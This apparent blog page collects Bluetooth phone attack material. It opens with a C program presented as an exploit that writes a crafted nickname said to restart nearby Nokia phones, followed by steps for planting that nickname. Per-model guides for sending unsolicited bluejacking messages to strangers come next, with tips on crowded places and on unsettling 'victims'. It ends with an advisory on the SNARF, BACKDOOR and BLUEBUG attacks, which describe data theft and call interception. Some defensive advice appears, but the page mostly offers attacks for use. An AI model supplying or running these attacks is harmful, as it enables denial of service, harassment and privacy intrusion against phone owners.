This is the exploit

/*
Nokia Bluetab Exploit
Found & coded by Qnix

- This Exploit will creat file called bluetab.txt with your
bluetooth nickname, send the file to your nokia mobile
open it copy the nickname and paste it to your bluetooth
nickname, if any one search and find your nickname his
mobile will restart .
- this exploit work on many other symbian and java mobiles .

Qnix – Qnix@bsdmail.org

*/
#define tab1 0×09
#define tab2 0×2E
#define dot1 0×0A

int main(int argc,char *argv[])
{

FILE *bluetab;

if(argc < 2)
{
msgm();
printf("Useage : ./bluetab n");
return 0;
}
else
{
msgm();
printf("bluetab.txt file created with your nickname . n");
}

bluetab = fopen("bluetab.txt","w");
if(!bluetab)
{
msgm();
printf("Some kind of file error!n");
return 0;
}

fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);
fclose(bluetab);
return 0;

}

msgm()
{

printf(" ------------------------------- n");
printf(" Nokia Bluetab Exploit n");
printf(" found & coded by n");
printf(" Qnix@bsdmail.org n");
printf(" ------------------------------- nn");
}

note:This article is provided for knowledge purpose.MTB by any means is not responsible for how you use it.

UPDATE : Corrected a wrong line in the code.

Technorati Tags: nokia, vulnerability

1) send attachment to your phone, than open it with notepad
2)——————

” © ”

——————
You will see a message like this, if you know how to do copy paste operations in your phone , your job is easy.
Copy the line ” © ”
to copy come to the start of the line which is begining with ”
press pencil button on your phone (donot release button) and move cursor to the right, select all text (only that line), still dont release button, you will see the left key become the key for copy, press the copy button.
Now you can close the notepad
Open your bluetooth menu, and change your name. when writing your name, press pencil key again, you will see that right key become the key for paste. Paste it and save it.
If you do it right, you will see that your bluetooth name wont squeeze the name screen. You will see a red “c out of the name box.
Now you can try it if you have 2 phones. Nobody can use bluetooth without your permission.

Text file

• bluestumbler – Monitor and log all visible bluetooth devices (name, MAC, signal strength, capabilities), and identify manufacturer from MAC address lookup.
• bluebrowse – Display available services on a selected device (FAX, Voice, OBEX etc).
• bluejack – Send anoymous message to a target device (and optionally broadcast to all visible devices).
• bluesnarf - Copy data from target device (everything if pairing succeeds, or a subset in other cases, including phonebook and calendar. In the latter case, user will not be alerted by any bluejack message).
• bluebug – Set up covert serial channel to device.
  Tools will not be released at this time, so please do not ask. However, if you are a bona-fide manufacturer of bluetooth devices that we have been otherwise unable to contact, please feel free to get in touch for more details on how you can identify your device status.

Nokia 6310 / 6310i Bluejacking Guide

1. Go to Names
2. Select Add name
3. Type your message and press OK
4. Press OK without entering a phone number (unless you want to send one)
5. Press Done
6. Go to Names
7. Select Search
8. Find your message
9. Select Details
10. Select Options
11. Select Send bus. card
12. Select Via Bluetooth
13. If any devices come up select them
14. If it says Business card sent, you have just bluejacked someone.

Nokia 6600 Bluejacking Guide

1. First press the 5-way joystick down.
2. Then choose options.
3. Then choose “New contact”
4. Then in the first line choose your desired message.
5. Then press done.
6. Then go to the contact.
7. Then press options.
8. Then scroll down to send.
9. Then choose “Via Bluetooth”
10. Then the phone will be searching for enabled Devices.
11. Then press “Select”

Sony Ericsson T610 / T630 Bluejacking Guide

1. Go into the main menu
2. Go to phonebook
3. Choose Add Contact
4. On the Name box, press Add
5. Type in your message
6. Press OK
7. Press Save
8. Come back to main screen
9. Press down on the joystick
10. Find your new contact
11. Press More
12. Choose Send contact
13. Choose Via Bluetooth
14. Phone will then be Searching
15. When it’s finished, it will display “Devices Found”
16. Choose the device you want to Bluejack
17. If successful, your phone will say “Contact sent”, if not, “Bluetooth connection failed. Retry?”
18. That’s it!

Sony Ericsson Z600 Bluejacking Guide

1. Press Down on Standby Mode
2. Find your pre-made custom contact
3. Press More
4. Choose Send Contact
5. Choose Via Bluetooth
6. Phone will display “Searching”
7. When it’s finished, it will display the Found Devices
8. Choose the device you want to bluejack
9. If successful, your phone will say “Contact sent”, if not, “Bluetooth connection failed. Retry?”

Sony Ericsson P900 Bluejacking Guide

1. Go into ‘Contacts’
2. Press ‘Contacts’ at the top right, then ‘New’
3. Write the short message you want to send on the line next to ‘Last name’
4. Press the black return arrow in the bottom right corner of the screen
5. Find your contact by scrolling down the phone book
6. Click on it
7. Press ‘Contacts’ then ‘Send As’
8. Select ‘Bluetooth’ from the drop-down list, then ‘Done’
9. Your phone will search for devices
10. When it’s finished, the ‘Searching’ popup will disappear
11. Click on the box on the left of the device you want to send your message to
12. Press ‘Send’
13. If it sends, a progress bar will appear. Just leave it. If it fails, it will say “Failed to transfer entry to ’s phone.
14. Listen out for your victim!

Motorola V500/V600/v551/v547/v555 Bluejacking Guide

1. Go to Phone Book
2. Select New Entry
3. Insert the message you want to send in Name, email address etc.
4. Save contact
5. The contact will now be highlighted in the phone book
6. Press the Info button (one with 3 lines on)
7. Scroll to Send and select Send
8. Choose Bluetooth
9. Select Look For Devices
10. Then select the device you want to bluejack
11. That’s it!

Motorola E550 Bluejacking Guide

1. Randomly press numbers on the main screen, click store
2. Name will be highlighted, change this to the message you want to send and save it
3. You will now be back at the main menu, press DOWN on the 5 way key to go to contacts
4. Highlight your new entry
5. Click Menu key and select send
6. Click yes at “Temporarily enable bluetooth”, then look for devices
7. Send to the most interesting name
8. Laugh at the person looking around confused

Motorola A835 Bluejacking Guide

1. Go to Contacts (Default control is down joystick).
2. Press joystick up once to get to ‘[Add Entry]‘
3. Press ‘Select’
4. Highlight ‘Phone Number’
5. Press ‘Select’
6. Press ‘Select’ once more and type in a message as the name
7. Press ‘OK’
8. Press ‘Select’ and enter a number (can be anything i.e. 12345)
9. Press ‘OK’
10. Press ‘Done’
11. Press ‘Menu’ (Middle key) and move joystick up 1 to highlight ‘Send’
12. Press ‘Select’
13. Highlight ‘Bluetooth’ and Press ‘Select
14. With [Look For Devices] highlighted, press ‘Select’
15. If scan is successful (*see note 1), a list of devices will appear. Select a device from the list with joystick, then press ‘Select’ to send the contact.

*note 1: The scan has two passes. During the first pass, the phone looks for devices in range. If one is found, it is counted and the scan continues. At the end of the first pass, the phone has the MAC (Media Access Control) addresses of each device in range when the first pass took place. If the scan is interrupted by pressing ‘Stop’, these addresses will be visible.

In the second pass, the phone attempts to retrieve the Bluetooth Name set in each of the devices. If a device has moved out of range or has a marginal signal, the MAC Address is displayed. Please note that some devices’ Bluetooth Names are set to the MAC address by default.

O2 XDA / MDA2 & iMate Bluejacking Guide

1. Click the Windows / Start icon
2. Select Contacts
3. Select the pre-made contact with the message you want to send
4. In the list that appears, tap and hold the message you want to send, and in the popup box that appears select Beam Contact. If you want to send more than one contact, tap and hold a contact then drag and highlight all the contacts you want to send.
5. On the screen that appears, your message(s) will be displayed, followed by the prompt To beam, select a device. In the list below, any found Infra Red devices will be listed as a red icon, and any Bluetooth devices will be listed as a blue wave icon.
6. Any found devices will be displayed as a MAC address ( 12 digits long ), then after a few seconds the address will change to the devices Bluetooth name if it can be found. To the right of each found device you will see the message Tap to send – simply tap the devices you want to send your message(s) to.
7. Once tapped, the XDA2 will then say Pending while connection is setup, followed by Sending 1/1, followed by Done. The 1/1 bit means you are sending 1 contact out of 1 selected. So if you wanted to send 20 bluejacks, it would say 1/20, then 2/20, 3/20. This should happen very rapidly.
8. Your XDA2 will continue searching until you tell it to stop, so you can sit there all day until either you get bored or the battery runs out. Simply keep tapping to send whenever a device comes into range.
9. To finish bluejacking, simply click OK at the top of the screen.

Palm Tungsten T & T2 Bluejacking Guide

1. Click New in bottom right corner
2. In Last Name field write the message you want to send
3. When message is written tap the Done button
4. Find contact in Address Book and click/tap it
5. Click/tap the blue box with Address written in white
6. Choose Send Contact
7. Choose Send With Bluetooth and “OK”
8. Device will now search for Bluetooth enabled devices
9. Once it found some tick box the ones you want to send to & then send

Orange HTC C500 iMate Bluejacking Guide

1. Turn on Bluetooth by pressing Start/Settings/Bluetooth/Bluetooth, and selecting either “on” or “discoverable” then press Done/Done/Done/Home to return to the home screen

2. From the home screen select Start/Contacts then press the left hotkey, now labelled “new”.

3. Type your message into the “first name” field and complete any other fields you wish to, but remember that not all phones will recognise the number of fields the C500 does!!

4. When you’re finished, select “Done” and you will be returned to the Contacts list.

5. Find your contact by either scrolling down or searching and highlight it.

6. Hit Menu and then “beam contact”.

7. You will then see the beaming options screen. “IR will be at the top, with “Align” in the column on the right. Below that, there will be a Magnifying Glass with “Searching” next to it. This is the device searching for Bluetooth devices. When it finds a Bluetooth device it may display the device name or MAC address.

8. Highlight the device and select the left hotkey marked “Beam”.

9. The column on the right of the device name should now read “pend”. If you have a successful bluejack it will read “done”. If the contact is rejected it will display “fail”. If the device stays on “pend” for a long time it may be waiting for acceptance, to stop trying to send, highlight it and press the rocker switch in (as if you were trying to select it).

Bluetooth Enabled PC Bluejacking Guide

1. Go to contacts in your Address Book program (e.g Outlook)
2. Create a new contact
3. Enter the message into one of the ‘name’ fields
4. Save the new contact
5. Go to the address book
6. Right-click on the message/contact
7. Go to action
8. Go to Send to Bluetooth
9. Click on other
10. Select a device from the list and double click on it

Will my phone number be sent out with anything I send when I bluejack somebody?
No. As I said earlier, Bluetooth is a feature on your phone and has nothing to do with your network and therefore nothing to do with your phone number.

How do I stop people from bluejacking me?
You can either go into your Bluetooth menu and switch it off, or if you need Bluetooth on for one reason or another you can simply set your phone to ‘Undiscoverable’ in your Bluetooth menu. This means that other Bluetooth devices won’t find you when they search for Bluetooth devices.

Can someone hack my phone and steal my phonebook contacts?
Yes,what you are describing is a form of ‘bluesnarfing’.

Name: “Make of victim’s phone” suck, buy “make of your phone”!
Email: You’ve-just-been-bluejacked-by-”your name”

Some good places to bluejack:
- Busy shopping centre
- Starbucks
- Train Station
- High Street
- On a train/ tube/ bus
- Cinema
- Café/ restaurant/ pub
- Mobile phone shop
- Electronics shop

In case it all goes wrong:
If you manage to identify your victim and they are looking angry rather than puzzled & confused, jellyellie’s advise is to run, not walk, in the opposite direction!

The Reveal:
‘The Reveal’ is what it all comes down to in the end. It is what your messages have been building up to, and it’s certainly the climax of your exchange.

If you know who your victim is, when it’s time for you to leave the area send them a contact saying something like “Listen out for ‘parrot’”. Then, as you walk past them, say (loudly) to yourself “I hope my parrot will be OK!” That will definitely get their attention (tried, tested and proven by jellyellie).

Code of Ethics
1.1) Bluejackers will only send messages/pictures. They will never try to ‘hack’ a device for the purpose of copying or modifying any files on any device or upload any executable files. By hacking a device you are commiting an offence under the computer misuse act 1990, which states it is an offence to obtain unauthorised access to any computer. changes in this law soon will cover all mobile devices including phones.

1.2) Any such messages or pictures sent will not be of an insulting, libelous or pornographic nature and will be copyright free or copyrighted by the sender. Any copyright protected images/sound files will only be sent with the written consent of the copyright holder.

1.3) If no interest is shown by the recipient after 2 messages the bluejacker will desist and move on.

1.4) The bluejacker will restrict their activity to 10 messages maximum unless in exceptional circumstances e.g. the continuous exchange of messages between bluejacker & victim where the victim is willing to participate, the last message being a final comment or parting sentiment (perhaps include www.bluejackq.com web address).

1.5) If the Bluejacker senses that he/she is causing distress rather than mirth to the recipient they will immediately decease all activity towards them.

1.6) If a bluejacker is caught ‘in the act’ he/she will be as co-operative as possible and not hide any details of their activity (honesty is the best policy).

Bluejacking uses the class 1 Bluetooth connection now available on an increasing number of phones (not just those at the top end of the range) Bluetooth was conceived to enable devices to exchange data at up to 1mbit/s over relatively short distances (typically no more than 10 meters). Of course like the best or should that be worst protocols no one thought that the Bluetooth system would be used to push messages it was designed to link devices for data transfer for example Bluetooth headsets or synchronising email or contacts with a PC perhaps even linking your fridge and TV. So the security of Bluetooth was left to a pairing system, this attempts to ensure that only devices that have exchanged a password can immediately connect to each other and to be fair this works well.

However Bluejacking uses the start of the pairing process to deliver its payload, in order for a device to be paired it must be made “visible” this means any Bluetooth device can search for and find the device which is listed by its name and then attempt to pair, of course the pair will only be accepted if the other user agrees.

Bluejacking relies on the vast numbers of mobile phones that are shipped as “visible” from the factory, or the users who leave their phones set to visible for ease of use, instead of searching for a phone to pair with a bluejacker will search for phones within range and then send a contact from their phones memory which will appear as a message on the screen of the other mobile.

This unsolicited message looks to all intents like an SMS but the user is mystified as it does not have a phone number or indeed anyway of tracing its sender, messages tend to be quite limited as most mobiles will only display the first line of the contact on the screen, but that is normally room to come up with something amusing.

Time for the easy steps that show you how to bluejack.

1. Select your area carefully, you need an area with plenty of mobile users, stations and areas with business men and women are best but supermarkets and other places with large groups of people are also good.

2. You’ll want to pre prepare a few contacts to send, fill in the first line and perhaps some of the other parameters like email, but most bluejack victims will only see the first line, it is possible to send photos too this can be great once you have identified a victim.

3. Scan for Bluetooth enabled phones, go into your phone’s contacts select the card you have already made and select “send via Bluetooth” this will start a search for all Bluetooth devices within a 10 meter range.

4. You will see a list of the phone names in range, pay attention as these will often be the phone model name useful for identifying who you have bluejacked or at least amusing to find who has a phone named “sexy bum”, quickly select one phone and send the contact, Bluetooth will take a while to deliver the contact so speed is important to get your victim before they move out of range.

5. Having sent the contact you should get the confirmation “card sent” and then listen for the SMS message tone of your victims phone. Success you’ve Bluejacked!

6. If you can identify who you managed to Bluejack then you can follow up with a specific message which will really freak out your victim, for example ” hey that’s a funky hat” or “what train are you catching” the best messages are often very humorous and should amuse your victim.

So that’s Bluejacking, there are a few limited software applications which can run on Sony Ericsson phones such as SMAN.

Bluesnarfing and Bluestumbling are both more intrusive uses of Bluetooth technology, Bluesnarfing is the process of connecting to a mobile device and copying the contents without authorisation, this vulnerability is limited to a handful of Sony Ericsson and Nokia Phones. Bluetumbling is similar but the vulnerability can only be exploited by a device that was previously paired but has since been removed from the mobile device list, so not really anything to lose sleep over.

Firstly, confidential data can be obtained, anonymously, and without the owner’s knowledge or consent, from some bluetooth enabled mobile phones. This data includes, at least, the entire phonebook and calendar, and the phone’s IMEI.

Secondly, it has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted (”paired”) device that has since been removed from the trusted list. This data includes not only the phonebook and calendar, but media files such as pictures and text messages. In essence, the entire device can be “backed up” to an attacker’s own system.

Thirdly, access can be gained to the AT command set of the device, giving full access to the higher level commands and channels, such as data, voice and messaging. This third vulnerability was identified by Martin Herfurt, and they have since started working together on finding additional possible exploits resulting from this vulnerability.

Finally, the current trend for “Bluejacking” is promoting an environment which puts consumer devices at greater risk from the above attacks.

Vulnerabilities

The SNARF attack:
It is possible, on some makes of device, to connect to the device without alerting the owner of the target device of the request, and gain access to restricted portions of the stored data therein, including the entire phonebook (and any images or other data associated with the entries), calendar, realtime clock, business card, properties, change log, IMEI (International Mobile Equipment Identity [6], which uniquely identifies the phone to the mobile network, and is used in illegal phone ‘cloning’). This is normally only possible if the device is in “discoverable” or “visible” mode, but there are tools available on the Internet that allow even this safety net to be bypassed[4]. Further details will not be released at this time (see below for more on this), but the attack can and will be demonstrated to manufacturers and press if required.

The BACKDOOR attack:
The backdoor attack involves establishing a trust relationship through the “pairing” mechanism, but ensuring that it no longer appears in the target’s register of paired devices. In this way, unless the owner is actually observing their device at the precise moment a connection is established, they are unlikely to notice anything untoward, and the attacker may be free to continue to use any resource that a trusted relationship with that device grants access to (but note that so far we have only tested file transfers). This means that not only can data be retrieved from the phone, but other services, such as modems or Internet, WAP and GPRS gateways may be accessed without the owner’s knowledge or consent. Indications are that once the backdoor is installed, the above SNARF attack will function on devices that previously denied access, and without the restrictions of a plain SNARF attack, so we strongly suspect that the other services will prove to be available also.

The BLUEBUG attack:
The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off the shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner’s incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim.

Bluejacking:
Although known to the technical community and early adopters for some time, the process now known as “Bluejacking”[1] has recently come to the fore in the consumer arena, and is becoming a popular mechanism for exchanging anonymous messages in public places. The technique involves abusing the bluetooth “pairing”[2] protocol, the system by which bluetooth devices authenticate each other, to pass a message during the initial “handshake” phase. This is possible because the “name” of the initiating bluetooth device is displayed on the target device as part of the handshake exchange, and, as the protocal allows a large user defined name field – up to 248 characters – the field itself can be used to pass the message. This is all well and good, and, on the face of it, fairly harmless, but, unfortunately, there is a down side. There is a potential security problem with this, and the more the practice grows and is accepted by the user community, and leveraged as a marketing tool by the vendors, the worse it will get. The problem lies in the fact that the protocol being abused is designed for information exchange. The ability to interface with other devices and exchange, update and synchronise data, is the raison d’être of bluetooth. The bluejacking technique is using the first part of a process that allows that exchange to take place, and is therefore open to further abuse if the handshake completes and the “bluejacker” successfully pairs with the target device. If such an event occurs, then all data on the target device bacomes available to the initiator, including such things as phone books, calendars, pictures and text messages. As the current wave of PDA and telephony integration progresses, the volume and quality of such data will increase with the devices’ capabilities, leading to far more serious potential compromise. Given the furore that errupted when a second-hand Blackberry PDA was sold without the previous owner’s data having been wiped[3], it is alarming to think of the consequences of a single bluejacker gathering an entire corporate staff’s contact details by simply attending a conference or camping outside their building or in their foyer with a bluetooth capable device and evil intent. Of course, corporates are not the only potential targets – a bluejacking expedition to, say, The House of Commons, or The US Senate, could provide some interesting, valuable and, who’s to say, potentially damaging or compromising data.

The above may sound alarmist and far fetched, and the general reaction would probably be that most users would not be duped into allowing the connection to complete, so the risk is small. However, in today’s society of instant messaging, the average consumer is under a constant barrage of unsolicted messages in one form or another, whether it be by SPAM email, or “You have won!” style SMS text messages, and do not tend to treat them with much suspicion (although they may well be sceptical about the veracity of the offers). Another message popping up on their ‘phone saying something along the lines of “You have won 10,000 pounds! Enter this 4 digit PIN number and then dial 0900-SUCKER to collect your prize!” is unlikely to cause much alarm, and is more than likely to succeed in many cases.

Workarounds and fixes
We are not aware of any workarounds for the SNARF or BLUEBUG attacks at this time, other than to switch off bluetooth. For permanent fixes, see the ‘Fixes’ section at the bottom of the page.

To permanently remove a pairing, and protect against future BACKDOOR attacks, it seems you must perform a factory reset, but this will, of course, erase all your personal data.

To avoid Bluejacking, “just say no”.

The above methods work to the best of our knowledge, but, as the devices affected are running closed-source proprietory software, it not possible to verify that without the collaboration of the manufacturers. We therefore make no claims as to the level of protection they provide, and you must continue to use bluetooth at your own risk.

Who’s Vulnerable
To date the quantity of devices tested is not great. However, due to the fact that they are amongst the most popular brands, we still consider the affected group to be large. It is also assumed that there are shared implementations of the bluetooth stack, so what affects one model is likely to affect others. This table is accurate to the best of our knowledge, but without the cooperation of the manufacturers (which we currently do not have), it is not possible to conduct more extensive validation.

The devices known to be vulnerable at this time are: